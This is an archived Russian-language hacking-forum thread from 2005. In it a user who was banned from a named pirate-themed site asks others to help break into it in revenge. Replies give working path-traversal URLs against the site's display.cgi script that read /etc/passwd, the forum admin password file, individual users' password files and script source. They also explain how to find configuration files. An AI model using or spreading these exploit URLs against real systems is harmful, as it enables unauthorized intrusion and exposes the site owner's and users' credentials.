PDA

Просмотр полной версии : Форум пиратов


Black_Death
21.01.2005, 19:46
Народ, помогите взломать форум на http://pirates.com.ru, а то и сам сайт. Просто меня там забанили не за что и я очень разозлился!!! А сам взломать его я не смогу. Мне очень интересно узнать какие там баги есть, чтобы совершить ВЗЛОМ (не хочу я сайт дефейсить). Заранее спасибо!

Че Гевара
22.01.2005, 14:08
Копай в этом направлении:

http://pirates.com.ru/cgi-bin/display.cgi?data=../../../../etc/passwd

Black_Death
22.01.2005, 15:29
Большое спасибо! И как же я сам такой баг не заметил...........

bad_boy
22.01.2005, 15:51
ба то баг, но помоему это fake :)

Trinux
22.01.2005, 17:20
2 bad_boy
fake???? АААА =)))) Фейк =)))) УУУУАХХАХАХХХАХА ХХАХАХАХАХА АХАХАХАХ... ууу... фууу... Блин. Спасибо за улыбку на моем лице =). Сорри парень, я тебя не высмеиваю ни в коем случае =) Смотри. http://pirates.com.ru/cgi-bin/display.cgi?data=gdfgdfgd что видишь? "Unable to open /home/pirates/public_html/gdfgdfgd". Ни о чем не говорит? А если http://pirates.com.ru/cgi-bin/display.cgi?data=cgi-bin/display.cgi что видим? Види сурс display.cgi. А что еще надо? Видишь сурс любых файлов на сервере, ищешь конфиги форума или еще что. Короче принцип ясен? И в следующий раз перед тем как кричать, что Че Гевара фейками раскидывается - проверь чтоль =)

2 Модеры
Сорри за оффтопик =))))

Trinux
22.01.2005, 17:25
http://pirates.com.ru/cgi-bin/display.cgi?data=../black_words.lst
=)))))))))))))))))))))))))))))))))))

Trinux
22.01.2005, 17:33
http://pirates.com.ru/cgi-bin/display.cgi?data=../forum/admin.pwd
Пасс админа =)

Trinux
22.01.2005, 17:34
http://pirates.com.ru/cgi-bin/display.cgi?data=../forum/users/Elvis.usr
Вместо Elvis имя пользователя. Первая переменная - пасс.

http://pirates.com.ru/cgi-bin/display.cgi?data=../forum/users/Black_Death.usr
Пасс меняй везде =))))

Trinux
22.01.2005, 17:35
А хотя нет, это все Фейк =))))))))))))))))))))) ой блин =))))

Trinux
22.01.2005, 17:45
http://pirates.com.ru/cgi-bin/display.cgi?data=cgi-bin/forum.cgi
Вот, кому еще форум интересен. Я так и не понял, как админ авторизируется, но мне влом дальше =)

Че Гевара
22.01.2005, 17:47
2 Trinux
:p

Black_Death
22.01.2005, 18:03
Аааа....ни хрена!!!! Я на этом форуме регился дааавно! Теперь у меня пасс другой!!!

PEPSICOLA
23.01.2005, 19:33
ну и пасс :D

bad_boy
23.01.2005, 20:03
И в следующий раз перед тем как кричать, что Че Гевара фейками раскидывается - проверь чтоль =)

Что за глупость. Я не говорил что это Че Гевара, я имел ввиду то что это админы сайта пиратов его подсунули.
я хоть и новичок в этом деле, но думаю что это всёже не файл паролей

Че Гевара
23.01.2005, 20:12
Естественно, что это и не пароли, как таковые ...
Я просто намекнул где кроется уязвимость ...

Trinux
23.01.2005, 22:29
Вообще, у меня вроде не малый опыт, но я сам лично ни разу фейка не встричал. Друзья рассказывали, а я не видел ни разу...